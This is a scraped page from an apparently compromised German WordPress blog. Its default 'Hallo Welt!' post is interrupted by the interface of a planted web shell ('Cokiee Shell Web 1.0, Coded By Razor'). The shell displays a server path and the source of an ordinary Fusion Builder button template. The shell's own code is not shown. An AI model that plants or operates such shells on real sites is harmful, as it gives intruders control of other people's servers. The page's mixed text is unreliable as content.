Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web28/html/wp-content/plugins/fusion-builder/front-end/templates/ |
Current File : //var/www/web28/html/wp-content/plugins/fusion-builder/front-end/templates/fusion-button.php |
<?php /** * Underscore.js template * * @package fusion-builder * @since 2.0 */ ?> <script type="text/html" id="tmpl-fusion_button-shortcode"> <# var iconHTML = ''; if ( values.icon ) { iconHTML = '<i' + _.fusionGetAttributes( IconAttr ) + '></i>'; if ( 'yes' === values.icon_divider ) { iconHTML = '<span class="fusion-button-icon-divider button-icon-divider-' + values.icon_position + '">' + iconHTML + '</span>'; } else if ( 'icon_position' === values.hover_transition ) { iconHTML += iconHTML; } } buttonText = '<span' + _.fusionGetAttributes( textAttr ) + '>' + values.element_content + '</span>'; if ( 'text_slide_up' === values.hover_transition || 'text_slide_down' === values.hover_transition ) { buttonText = '<div class="awb-button-text-transition">' + buttonText + buttonText + '</div>'; } innerContent = ( 'left' === values.icon_position ) ? iconHTML + buttonText : buttonText + iconHTML; #> <div {{{ _.fusionGetAttributes( wrapperAttr ) }}}> <# if ( 'undefined' !== typeof values.button_el_type && 'submit' === values.button_el_type ) { #> <button {{{ _.fusionGetAttributes( attr ) }}} > {{{ innerContent }}} </button> <# } else { #> <a {{{ _.fusionGetAttributes( attr ) }}} > {{{ innerContent }}} </a> <# } #> </div> </script>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare